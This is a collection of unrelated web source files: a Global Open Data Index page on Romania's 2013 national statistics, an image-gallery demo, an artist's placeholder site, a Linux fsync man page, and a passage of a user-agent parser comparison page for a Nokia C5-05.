<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="Open Knowledge">
<meta name="description" content="The state of government open data in Romania for National Statistics in 2013
">
<meta name="keywords" content="Romania, National Statistics, 2013, Open Government, Open Data, Government Transparency, Open Knowledge
">
<meta property="og:type" content="website"/>
<meta property="og:title" content="Open Data Index - Open Knowledge"/>
<meta property="og:site_name" content="Open Data Index"/>
<meta property="og:description"
content="The state of government open data in Romania for National Statistics in 2013"/>
<meta property="og:image" content="/static/images/favicon.ico"/>
<title>Romania / National Statistics (2013) | Global Open Data Index by Open Knowledge</title>
<base href="/">
<!--[if lt IE 9]>
<script src="/static/vendor/html5shiv.min.js"></script>
<![endif]-->
<link rel="stylesheet" href="/static/css/site.css">
<link rel="icon" href="/static/images/favicon.ico">
<script>
var siteUrl = '';
</script>
</head>
<body class="place_dataset">
<div class="fixed-ok-panel">
<div id="ok-panel" class="closed">
<iframe src="http://assets.okfn.org/themes/okfn/okf-panel.html" scrolling="no"></iframe>
</div>
<a class="ok-ribbon"><img src="http://okfnlabs.org/ok-panel/assets/images/ok-ribbon.png" alt="Open Knowledge"></a>
</div>
<header id="header">
<nav class="navbar navbar-default" role="navigation">
<div class="container">
<div>
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse"
data-target="#navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<div class="logo">
<a href="/">
<img src="/static/images/logo2.png">
<span>Global<br/>Open Data Index</span>
</a>
</div>
</div>
<div class="collapse navbar-collapse" id="navbar-collapse">
<ul class="nav navbar-nav" style="margin-right: 132px;">
<li>
<a href="/place/" title="About the Open Data Index project">
Places
</a>
</li>
<li>
<a href="/dataset/" title="About the Open Data Index project">
Datasets
</a>
</li>
<li>
<a href="/download/" title="Download Open Data Index data">
Download
</a>
</li>
<li>
<a href="/insights/" title="Insights">
Insights
</a>
</li>
<li>
<a href="/methodology/"
title="The methodology behind the Open Data Index">
Methodology
</a>
</li>
<li>
<a href="/about/" title="About the Open Data Index project">
About
</a>
</li>
<li>
<a href="/press/"
title="Press information for the Open Data Index">
Press
</a>
</li>
</ul>
</div>
</div>
</div>
</nav>
</header>
<div class="container">
<div class="content">
<div class="row">
<div class="col-md-12">
<ol class="breadcrumb">
<li>
<a href="/">Home</a>
</li>
<li><a href="/place">Places</a></li>
<li><a href="/place/romania/">Romania</a></li>
<li class="active">National Statistics</li>
</ol>
<section id="data-header">
<div class="row">
<div class="col-md-6">
<h1>
<a href="/dataset/statistics/" title="See more data on National Statistics in the Open Data Index">National Statistics</a> / <a href="/place/2013/" title="See more Index data in 2013">2013</a> <span class="place-openness" data-score="45">45% open</span>
</h1>
<h3>
<a href="/place/romania/" title="See more data on Romania in the Open Data Index">Romania</a>
</h3>
<!--div class="col-md-12 place-rank statistics">
<span class="">Romania is ranked #46 for this dataset</span>
</div>
<div class="row relative">
</div-->
<div class="row navigate">
<div class="col-md-12">
<h4 class="inline">See other years</h4>
<div class=" inline">
<a class="" href="/place/romania/statistics/" title="Current">Current</a>
<a class="" href="/place/romania/statistics/2014/" title="2014">2014</a>
</div>
</div>
<div class="col-md-12">
<h4>Share or embed this page</h4>
<div class="btn-group">
<a href="" class="btn btn-default embed" data-toggle="modal" data-target="#embed-instructions">
<i class="fa fa-code"></i> Embed
</a>
<a href="http://twitter.com/share?url=/place/romania/statistics/2013/&text=Check out this data from the Global Open Data Index" class="btn btn-default twitter" target="_blank">
<i class="fa fa-twitter"></i> Twitter </a>
<a href="http://www.facebook.com/sharer/sharer.php?u=/place/romania/statistics/2013/" class="btn btn-default facebook" target="_blank">
<i class="fa fa-facebook"></i> Facebook </a>
<a href="https://plus.google.com/share?url=/place/romania/statistics/2013/" class="btn btn-default google-plus" target="_blank">
<i class="fa fa-google-plus"></i> Google+ </a>
</div>
<div class="modal fade" id="embed-instructions" tabindex="-1" role="dialog" aria-labelledby="embedLabel" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>
<h4 class="modal-title" id="embedLabel">Map embed code</h4>
</div>
<div class="modal-body">
<p>
Use the following code to embed the map visualisation into your own website.
</p>
<xmp contenteditable="true"><iframe width="100%" height="360px" src="/vis/map/embed/?embed_width=100%&embed_height=360px&filter_year=2013&filter_dataset=statistics&panel_tools=false&panel_share=false&embed_title=Romania ; National Statistics ; 2013&map_place=ro" frameBorder="0"></iframe></xmp>
<p>
If you are a developer, you can read more about the embed options here: <a href="https://github.com/okfn/opendataindex/#choropleth-map" title="Embed options">Embed options</a>
</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-6">
<div id="map-container">
<iframe width="100%" height="360px" src="/vis/map/embed/?embed_width=100%&embed_height=360px&filter_year=2013&filter_dataset=statistics&panel_tools=false&panel_share=false&embed_title=Romania ; National Statistics ; 2013&map_place=ro" frameBorder="0"></iframe> </div>
</div>
</div>
</section>
<hr />
<section class="dataset-about">
<div class="row">
<div class="col-md-12">
<h3>What data is expected?</h3>
<p>Key national statistics such as demographic and economic indicators (GDP, unemployment, population, etc). To satisfy this category, the following minimum criteria must be met:</p>
<ul>
<li>GDP for the whole country updated at least quarterly</li>
<li>Unemployment statistics updated at least monthly</li>
<li>Population updated at least once a year</li>
</ul>
</div>
</div>
<div class="row">
<div class="col-md-12">
<h3>What data is available</h3>
</div>
<div class="col-md-6">
<ul class="availability-single">
<li class="no" data-toggle="popover" title="<h4><p>Openly licensed? </p></h4>" data-content="<p>The licence must comply with the Open Definition which allows data to be freely used, reused and redistributed. The Open Definition provides a list of conformant licences. If the data uses one of these licences, it is openly licensed.</p>
<p>Licences are commonly found in:</p>
<ul>
<li>the web page footer</li>
<li>a link to Terms &amp; Conditions</li>
<li>the About section</li>
</ul>
<p>Some licences may allow re-use and redistribution but have not been assessed as conformant with the Open Definition. In this case, seek feedback on the Open Data Index discussion forum</p>" data-placement="right">
<i class="fa fa-unlock-alt pointer" title="Click for more information"></i>
Openly licensed? No (No URL given) </li>
<li class="no" data-toggle="popover" title="<h4><p>Is the data available for free? </p></h4>" data-content="<p>The data is free if you don’t have to pay for it.</p>" data-placement="right">
<i class="fa fa-dollar pointer" title="Click for more information"></i>
Is the data available for free? No </li>
<li class="yes" data-toggle="popover" title="<h4><p>Is the data machine readable? </p></h4>" data-content="<p>All files are digital, but not all can be processed or parsed easily by a computer. In order to answer this question, you would need to look at the file type of the dataset. As a rule of thumb the following file types are machine readable:</p>
<ul>
<li>XLS</li>
<li>CSV</li>
<li>JSON</li>
<li>XML</li>
</ul>
<p>The following formats are NOT machine readable:</p>
<ul>
<li>HTML</li>
<li>PDF</li>
<li>DOC</li>
<li>JIF</li>
<li>JPEG</li>
<li>PPT</li>
</ul>
<p>If you have a different file type and you don’t know if it’s machine readable or not, ask in the Open Data Census forum</p>" data-placement="right">
<i class="fa fa-keyboard-o pointer" title="Click for more information"></i>
Is the data machine readable? Yes (PDF, CSV, XLS)
</li>
<li class="no" data-toggle="popover" title="<h4><p>Available in bulk? </p></h4>" data-content="<p>Data is available in bulk if the whole dataset can be downloaded easily. It is considered non-bulk if the citizens are limited to getting parts of the dataset through an online interface.</p>
<p>For example, if restricted to querying a web form and retrieving a few results at a time from a very large database.</p>" data-placement="right">
<i class="fa fa-copy pointer" title="Click for more information"></i>
Available in bulk? No </li>
<li class="yes" data-toggle="popover" title="<h4><p>Is the data provided on a timely and up to date basis? </p></h4>" data-content="<p>Is the data current for the census year? You can determine or estimate when the data was last updated and its update frequency by reviewing:</p>
<ul>
<li>the metadata displayed for the data in an open data portal or web page</li>
<li>the dataset title or filename e.g. Budget 2013-14 or Election_4July2015.csv</li>
<li>metadata tags embedded in the web page that contains the data</li>
<li>date values within the data to find the most recent date value</li>
<li>the timestamp on the data file (although this may not be accurate)</li>
<li>Some data is not updated on a regular basis. e.g. Pollutant emissions may be updated daily - while postal codes may not change for many years. </li>
</ul>
<p>You may need to use your judgement to determine if the data is timely and up to date. Document your rationale in the comments section.</p>
<p>If you cannot determine a date, answer, &quot;NO&quot; i.e. the data is not timely or up-to-date.</p>" data-placement="right">
<i class="fa fa-clock-o pointer" title="Click for more information"></i>
Is the data provided on a timely and up to date basis? Yes </li>
<li class="yes" data-toggle="popover" title="<h4><p>Publicly available? </p></h4>" data-content="<p>Can the data be accessed by the public without restrictions? Data is considered publicly available when:</p>
<ul>
<li>It can be accessed online without the need for a password or permissions.</li>
<li>If the data is in paper form, can be accessed by the public, and there is no restrictions on the number of photocopies that can be made.</li>
</ul>
<p>Data is <strong>NOT</strong> publicly available when:</p>
<ul>
<li>It is only made available after making a request.</li>
<li>It was availiable because of FOIA. </li>
<li>It can only be accessed by government officials.</li>
</ul>" data-placement="right">
<i class="fa fa-eye pointer" title="Click for more information"></i>
Publicly available? Yes </li>
<li class="yes" data-toggle="popover" title="<h4><p>Is data in digital form? </p></h4>" data-content="<p>Data can be in a digital format, but not accessible online. For example: A country budget can be stored on a spreadsheet or otherwise on a private government network, but not on the Internet. This means that the data is digital, but not publicly available. If you know that the data is digital somewhere inside the government (e.g. a government official tells you so), then you should answer “YES” to this question and note in the comment section how you discovered the data is in digital form.</p>" data-placement="right">
<i class="fa fa-save pointer" title="Click for more information"></i>
Is data in digital form? Yes </li>
<li class="yes" data-toggle="popover" title="<h4><p>Is the data available online? </p></h4>" data-content="<p>Data is online if it can be accessed via the Internet (e.g. a website or open data portal). If the data has been emailed to you but is not accessible via the Internet, it is not considered to be available online.</p>" data-placement="right">
<i class="fa fa-download pointer" title="Click for more information"></i>
Is the data available online? Yes (<a href="http://www.insse.ro/cms/">Here</a>) </li>
<li class="yes" data-toggle="popover" title="<h4><p>Does the data exist? </p></h4>" data-content="<p>Data must come from an official resource either issued directly by the government or by a third party officially representing the government. Data offered by companies, citizen initiatives or any non-governmental organisation do not count for the Index.</p>
<p>If the government has given the right to publish the data to third parties, a submission with a link a to third party site is allowed. The third-party site must explicitly state that the data has been commissioned by the government. Check if the organization has an agreement with the government to be the official source and make a note in the comment section.</p>" data-placement="right">
<i class="fa fa-file-o pointer" title="Click for more information"></i>
Does the data exist? Yes </li>
</ul>
</div>
<div class="col-md-6">
<h4><strong>Details</strong></h4>
<p>The National Statistics Institute collects the data and it can be retrieved: (1) online, free of charge, PDF format, for the main indicators (2) online, interrogation of the database, a limited amount free of charge. There is an € sign next to non-free data. All data requires an account.
(3) offline, bulk data, for a significantly higher fee, after submitting a specific request</p>
</div>
</div>
</section>
<section id="place-contributors">
<div class="row">
<h2>Contributors</h2>
<div class="col-md-6">
<h4>Reviewers</h4>
<ul>
<li>anonymous</li>
</ul>
</div>
<div class="col-md-6">
<h4>Submitters</h4>
<ul>
<li>anonymous</li>
</ul>
</div>
</div>
</section>
</div>
</div>
</div>
</div>
<footer id="footer">
<div class="container">
<div class="row">
<div class="footer-main col-md-8">
<div class="footer-attribution">
<p>
<a href="http://opendefinition.org/ossd/" title="Open Online Software Service">
<img src="http://assets.okfn.org/images/ok_buttons/os_80x15_orange_grey.png" alt=""
border=""/>
</a>
<a href="http://opendefinition.org/okd/" title="Open Online Software Service">
<img src="http://assets.okfn.org/images/ok_buttons/od_80x15_blue.png" alt="" border=""/>
</a>
<a href="http://opendefinition.org/okd/" title="Open Content">
<img src="http://assets.okfn.org/images/ok_buttons/oc_80x15_blue.png" alt="" border=""/>
</a>
–
<a href="http://creativecommons.org/licenses/by/3.0/"
title="Content Licensed under a CC Attribution"></a>
<a href="http://opendatacommons.org/licenses/pddl/1.0"
title="Data License (Public Domain)">Data License (Public
Domain)</a>
</p>
</div>
<div class="footer-meta">
<p>
This service is run by <a href="https://okfn.org/" title="Open Knowledge">Open Knowledge</a>
</p> <a class="naked" href="http://okfn.org/" title="Open Knowledge"><img
src="http://assets.okfn.org/p/okfn/img/okfn-logo-landscape-black-s.png" alt="" height="28"></a>
</div>
</div>
<div class="footer-links col-md-2">
<li><a href="http://okfn.org/" title="Open Knowledge">Open Knowledge</a></li>
<li><a href="http://okfn.org/opendata/" title="What is Open Data?">What is
Open Data?</a></li>
<li><a href="http://census.okfn.org/" title="Run your own Index">Run your
own Index</a></li>
<li><a href="https://github.com/okfn/opendataindex" title="The source code for Open Data Index">Source Code</a></li>
</div>
<div class="footer-links col-md-2">
<li><a href="/" title="Open Data Index home">Home</a></li>
<li><a href="/download/" title="Download data">Download</a></li>
<li><a href="/methodology/"
title="The methodology behind the Open Data Index">Methodology</a></li>
<li><a href="/faq/" title=" Open Data Index FAQ">FAQ</a></li>
<li><a href="/about/" title="About the Open Data Index">About</a></li>
<li><a href="/about/" title="Contact us">Contact</a></li>
<li><a href="/press/" title="Press">Press</a></li>
</div>
</div>
</div>
</footer>
<script data-main="/static/scripts/site" src="/static/scripts/require.js"></script>
</body>
</html>
|
Index.html
|
mohamednasr/MAgallery
|
<!--
* MAgallery - v1.0.0
* https://github.com/mohamednasr/MAgallery
* 2016-9-7
* Copyright (c) 2016 Mohamed Nasr
* License: MIT
-->
<!DOCTYPE html>
<html>
<head>
<title>MAgallery</title>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="http://fontawesome.io/assets/font-awesome/css/font-awesome.css">
<link rel="stylesheet" href="css/MAgallery.css">
</head>
<body>
<div class="container">
<div class="row">
<ul id="myGallery" class="gallery col-xs-12">
<li class="col-xs-6 col-sm-3"><span><img src="https://upload.wikimedia.org/wikipedia/commons/f/ff/Vertical_velocity.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="http://www.w3schools.com/css/trolltunga.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="http://7606-presscdn-0-74.pagely.netdna-cdn.com/wp-content/uploads/2016/03/Dubai-Photos-Images-Oicture-Dubai-Landmarks-800x600.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="https://pixabay.com/static/uploads/photo/2016/05/12/20/58/water-lilies-1388690_960_720.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="https://static.dvidshub.net/media/thumbs/photos/1210/692947/800w_q75.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="http://www.cfau-pd.net/images/images/images-2.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="https://i.kinja-img.com/gawker-media/image/upload/s--CJIMPKfv--/c_scale,fl_progressive,q_80,w_800/jkk0drl55vwjfkdqbmz6.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="http://www.irishtimes.com/polopoly_fs/1.2615940.1461057413!/image/image.jpg_gen/derivatives/landscape_685/image.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="https://cdn.eso.org/images/large/eso1520a.jpg"/></span></li>
<li class="col-xs-6 col-sm-3"><span><img src="http://i.dailymail.co.uk/i/pix/2016/04/24/12/337C6BFB00000578-0-image-a-83_1461496203790.jpg"/></span></li>
</ul>
</div>
</div>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/MAgallery.js"></script>
<script type="text/javascript">
MAgallery("myGallery");
</script>
</body>
</html>
|
index.html
|
bluej/website
|
<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
<!--Title-->
<title>Jessica Blue | artist</title>
<!--Favicons-->
<link type="image/x-icon" rel="shortcut icon" href="style/images/shortcut-icon.ico">
<!--CSS-->
<link type="text/css" rel="stylesheet" href="style/css/format.css"/>
<!--Fonts-->
<link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Hind">
<!--JS-->
</head>
<body>
<div id="container">
<div id="header">
<h2>JESSICA BLUE | artist</h2>
</div>
<div id="collage">
</div>
<div id="navbar">
<ul>
<li>PORTFOLIO</li>
<li>ABOUT</li>
<li>CONTACT</li>
<li>BLOG</li>
</ul>
</div>
<div id="footer">
<p>© 2015 by Jessica Blue</p>
</div>
</div>
</body>
</html>
|
manpages/man2/fsync.2.html
|
yuweijun/yuweijun.github.io
|
<!DOCTYPE html>
<HTML><head><TITLE>Manpage of FSYNC</TITLE>
<meta charset="utf-8">
<link rel="stylesheet" href="/css/main.css" type="text/css">
</head>
<body>
<header class="site-header">
<div class="wrap"> <div class="site-title"><a href="/manpages/index.html">linux manpages</a></div>
<div class="site-description">{"type":"documentation"}</div>
</div>
</header>
<div class="page-content"><div class="wrap">
<H1>FSYNC</H1>
Section: Linux Programmer's Manual (2)<BR>Updated: 2008-11-07<BR><A HREF="#index">Index</A>
<A HREF="/manpages/index.html">Return to Main Contents</A><HR>
<A NAME="lbAB"> </A>
<H2>NAME</H2>
fsync, fdatasync - synchronize a file's in-core state with storage device
<A NAME="lbAC"> </A>
<H2>SYNOPSIS</H2>
<B>#include <<A HREF="file:/usr/include/unistd.h">unistd.h</A>></B>
<P>
<B>int fsync(int </B><I>fd</I><B>);</B>
<P>
<B>int fdatasync(int </B><I>fd</I><B>);</B>
<P>
Feature Test Macro Requirements for glibc (see
<B><A HREF="/manpages/index.html?7+feature_test_macros">feature_test_macros</A></B>(7)):
<P>
<B>fsync</B>():
_BSD_SOURCE || _XOPEN_SOURCE
<BR>
<BR> || /* since glibc 2.8: */ _POSIX_C_SOURCE >= 200112L
<BR>
<B>fdatasync</B>():
_POSIX_C_SOURCE >= 199309L || _XOPEN_SOURCE >= 500
<A NAME="lbAD"> </A>
<H2>DESCRIPTION</H2>
<B>fsync</B>()
transfers ("flushes") all modified in-core data of
(i.e., modified buffer cache pages for) the
file referred to by the file descriptor
<I>fd</I>
to the disk device (or other permanent storage device)
where that file resides.
The call blocks until the device reports that the transfer has completed.
It also flushes metadata information associated with the file (see
<B><A HREF="/manpages/index.html?2+stat">stat</A></B>(2)).
<P>
Calling
<B>fsync</B>()
does not necessarily ensure
that the entry in the directory containing the file has also reached disk.
For that an explicit
<B>fsync</B>()
on a file descriptor for the directory is also needed.
<P>
<B>fdatasync</B>()
is similar to
<B>fsync</B>(),
but does not flush modified metadata unless that metadata
is needed in order to allow a subsequent data retrieval to be
correctly handled.
For example, changes to
<I>st_atime</I>
or
<I>st_mtime</I>
(respectively, time of last access and
time of last modification; see
<B><A HREF="/manpages/index.html?2+stat">stat</A></B>(2))
do not require flushing because they are not necessary for
a subsequent data read to be handled correctly.
On the other hand, a change to the file size
(<I>st_size</I>,
as made by say
<B><A HREF="/manpages/index.html?2+ftruncate">ftruncate</A></B>(2)),
would require a metadata flush.
<P>
The aim of
<B>fdatasync</B>()
is to reduce disk activity for applications that do not
require all metadata to be synchronized with the disk.
<A NAME="lbAE"> </A>
<H2>RETURN VALUE</H2>
On success, these system calls return zero.
On error, -1 is returned, and
<I>errno</I>
is set appropriately.
<A NAME="lbAF"> </A>
<H2>ERRORS</H2>
<DL COMPACT>
<DT><B>EBADF</B>
<DD>
<I>fd</I>
is not a valid file descriptor open for writing.
<DT><B>EIO</B>
<DD>
An error occurred during synchronization.
<DT><B>EROFS</B>, <B>EINVAL</B>
<DD>
<I>fd</I>
is bound to a special file which does not support synchronization.
</DL>
<A NAME="lbAG"> </A>
<H2>CONFORMING TO</H2>
4.3BSD, POSIX.1-2001.
<A NAME="lbAH"> </A>
<H2>AVAILABILITY</H2>
On POSIX systems on which
<B>fdatasync</B>()
is available,
<B>_POSIX_SYNCHRONIZED_IO</B>
is defined in
<I><<A HREF="file:/usr/include/unistd.h">unistd.h</A>></I>
to a value greater than 0.
(See also
<B><A HREF="/manpages/index.html?3+sysconf">sysconf</A></B>(3).)
<A NAME="lbAI"> </A>
<H2>NOTES</H2>
Applications that access databases or log files often write a tiny
data fragment (e.g., one line in a log file) and then call
<B>fsync</B>()
immediately in order to ensure that the written data is physically
stored on the harddisk.
Unfortunately,
<B>fsync</B>()
will always initiate two write operations: one for the newly written
data and another one in order to update the modification time stored
in the inode.
If the modification time is not a part of the transaction
concept
<B>fdatasync</B>()
can be used to avoid unnecessary inode disk write operations.
<P>
If the underlying hard disk has write caching enabled, then
the data may not really be on permanent storage when
<B>fsync</B>()
/
<B>fdatasync</B>()
return.
<P>
When an ext2 file system is mounted with the
<I>sync</I>
option, directory entries are also implicitly synced by
<B>fsync</B>().
<P>
On kernels before 2.4,
<B>fsync</B>()
on big files can be inefficient.
An alternative might be to use the
<B>O_SYNC</B>
flag to
<B><A HREF="/manpages/index.html?2+open">open</A></B>(2).
<P>
In Linux 2.2 and earlier,
<B>fdatasync</B>()
is equivalent to
<B>fsync</B>(),
and so has no performance advantage.
<A NAME="lbAJ"> </A>
<H2>SEE ALSO</H2>
<B><A HREF="/manpages/index.html?2+bdflush">bdflush</A></B>(2),
<B><A HREF="/manpages/index.html?2+open">open</A></B>(2),
<B><A HREF="/manpages/index.html?2+sync">sync</A></B>(2),
<B><A HREF="/manpages/index.html?2+sync_file_range">sync_file_range</A></B>(2),
<B><A HREF="/manpages/index.html?8+hdparm">hdparm</A></B>(8),
<B><A HREF="/manpages/index.html?8+mount">mount</A></B>(8),
<B><A HREF="/manpages/index.html?8+sync">sync</A></B>(8),
<B><A HREF="/manpages/index.html?8+update">update</A></B>(8)
<A NAME="lbAK"> </A>
<H2>COLOPHON</H2>
This page is part of release 3.22 of the Linux
<I>man-pages</I>
project.
A description of the project,
and information about reporting bugs,
can be found at
<A HREF="http://www.kernel.org/doc/man-pages/.">http://www.kernel.org/doc/man-pages/.</A>
<P>
<HR>
<A NAME="index"> </A><H2>Index</H2>
<DL>
<DT><A HREF="#lbAB">NAME</A><DD>
<DT><A HREF="#lbAC">SYNOPSIS</A><DD>
<DT><A HREF="#lbAD">DESCRIPTION</A><DD>
<DT><A HREF="#lbAE">RETURN VALUE</A><DD>
<DT><A HREF="#lbAF">ERRORS</A><DD>
<DT><A HREF="#lbAG">CONFORMING TO</A><DD>
<DT><A HREF="#lbAH">AVAILABILITY</A><DD>
<DT><A HREF="#lbAI">NOTES</A><DD>
<DT><A HREF="#lbAJ">SEE ALSO</A><DD>
<DT><A HREF="#lbAK">COLOPHON</A><DD>
</DL>
<HR>
This document was created by
<A HREF="/manpages/index.html">man2html</A>,
using the manual pages.<BR>
Time: 05:33:03 GMT, December 24, 2015
</div></div>
</body>
</HTML>
|
v5/user-agent-detail/24/8b/248b6d43-908d-413a-a280-307e9d828099.html
|
ThaDafinser/UserAgentParserComparison
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>User agent detail - NokiaC5-05</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css">
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<link href="../circle.css" rel="stylesheet">
</head>
<body>
<div class="container">
<div class="section">
<h1 class="header center orange-text">User agent detail</h1>
<div class="row center">
<h5 class="header light">
NokiaC5-05
</h5>
</div>
</div>
<div class="section">
<table class="striped"><tr><th></th><th colspan="3">General</th><th colspan="5">Device</th><th colspan="3">Bot</th><th colspan="2"></th></tr><tr><th>Provider</th><th>Browser</th><th>Engine</th><th>OS</th><th>Brand</th><th>Model</th><th>Type</th><th>Is mobile</th><th>Is touch</th><th>Is bot</th><th>Name</th><th>Type</th><th>Parse time</th><th>Actions</th></tr><tr><th colspan="14" class="green lighten-3">Test suite</th></tr><tr><td>WhichBrowser<br /><small>v2.0.18</small><br /><small>vendor/whichbrowser/parser/tests/data/mobile/manufacturer-nokia-series60.yaml</small></td><td> </td><td> </td><td>Series60 </td><td style="border-left: 1px solid #555"></td><td>C5-05</td><td>mobile:smart</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-027cff01-4a76-491b-ace3-9289fcbc172f">Detail</a>
<!-- Modal Structure -->
<div id="modal-027cff01-4a76-491b-ace3-9289fcbc172f" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>WhichBrowser result detail</h4>
<p><pre><code class="php">Array
(
[headers] => User-Agent: NokiaC5-05
[result] => Array
(
[os] => Array
(
[name] => Series60
[family] => Symbian
)
[device] => Array
(
[type] => mobile
[subtype] => smart
[manufacturer] => Nokia
[model] => C5-05
)
)
[readable] => a Nokia C5-05 running Series60
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><th colspan="14" class="green lighten-3">Providers</th></tr><tr><td>BrowscapFull<br /><small>6014</small><br /></td><td>Nokia </td><td> </td><td> </td><td style="border-left: 1px solid #555">Nokia</td><td></td><td>Mobile Phone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.014</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-47a9cd06-e213-4882-bc34-db6aed664223">Detail</a>
<!-- Modal Structure -->
<div id="modal-47a9cd06-e213-4882-bc34-db6aed664223" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>BrowscapFull result detail</h4>
<p><pre><code class="php">stdClass Object
(
[browser_name_regex] => /^.*nokia.*$/
[browser_name_pattern] => *nokia*
[parent] => Nokia
[comment] => Nokia
[browser] => Nokia
[browser_type] => Browser
[browser_bits] => 0
[browser_maker] => Nokia
[browser_modus] => unknown
[version] => 0.0
[majorver] => 0
[minorver] => 0
[platform] => unknown
[platform_version] => unknown
[platform_description] => unknown
[platform_bits] => 0
[platform_maker] => unknown
[alpha] =>
[beta] =>
[win16] =>
[win32] =>
[win64] =>
[frames] => 1
[iframes] => 1
[tables] => 1
[cookies] => 1
[backgroundsounds] =>
[javascript] => 1
[vbscript] =>
[javaapplets] =>
[activexcontrols] =>
[ismobiledevice] => 1
[istablet] =>
[issyndicationreader] =>
[crawler] =>
[isfake] =>
[isanonymized] =>
[ismodified] =>
[cssversion] => 0
[aolversion] => 0
[device_name] => general Mobile Device
[device_maker] => Nokia
[device_type] => Mobile Phone
[device_pointing_method] => unknown
[device_code_name] => general Mobile Device
[device_brand_name] => Nokia
[renderingengine_name] => unknown
[renderingengine_version] => unknown
[renderingengine_description] => unknown
[renderingengine_maker] => unknown
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>BrowscapLite<br /><small>6014</small><br /></td>
<td colspan="12" class="center-align red lighten-1">
<strong>No result found</strong>
</td>
</tr><tr><td>BrowscapPhp<br /><small>6014</small><br /></td><td>Nokia </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile Phone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.033</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68">Detail</a>
<!-- Modal Structure -->
<div id="modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>BrowscapPhp result detail</h4>
<p><pre><code class="php">stdClass Object
(
[browser_name_regex] => /^.*nokia.*$/
[browser_name_pattern] => *nokia*
[parent] => Nokia
[comment] => Nokia
[browser] => Nokia
[browser_type] => unknown
[browser_bits] => 0
[browser_maker] => Nokia
[browser_modus] => unknown
[version] => 0.0
[majorver] => 0
[minorver] => 0
[platform] => unknown
[platform_version] => unknown
[platform_description] => unknown
[platform_bits] => 0
[platform_maker] => unknown
[alpha] => false
[beta] => false
[win16] => false
[win32] => false
[win64] => false
[frames] => false
[iframes] => false
[tables] => false
[cookies] => false
[backgroundsounds] => false
[javascript] => false
[vbscript] => false
[javaapplets] => false
[activexcontrols] => false
[ismobiledevice] => 1
[istablet] =>
[issyndicationreader] => false
[crawler] =>
[isfake] => false
[isanonymized] => false
[ismodified] => false
[cssversion] => 0
[aolversion] => 0
[device_name] => unknown
[device_maker] => unknown
[device_type] => Mobile Phone
[device_pointing_method] => unknown
[device_code_name] => unknown
[device_brand_name] => unknown
[renderingengine_name] => unknown
[renderingengine_version] => unknown
[renderingengine_description] => unknown
[renderingengine_maker] => unknown
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>DonatjUAParser<br /><small>v0.5.1</small><br /></td><td>NokiaC5-05 </td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050">Detail</a>
<!-- Modal Structure -->
<div id="modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>DonatjUAParser result detail</h4>
<p><pre><code class="php">Array
(
[platform] =>
[browser] => NokiaC5-05
[version] =>
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
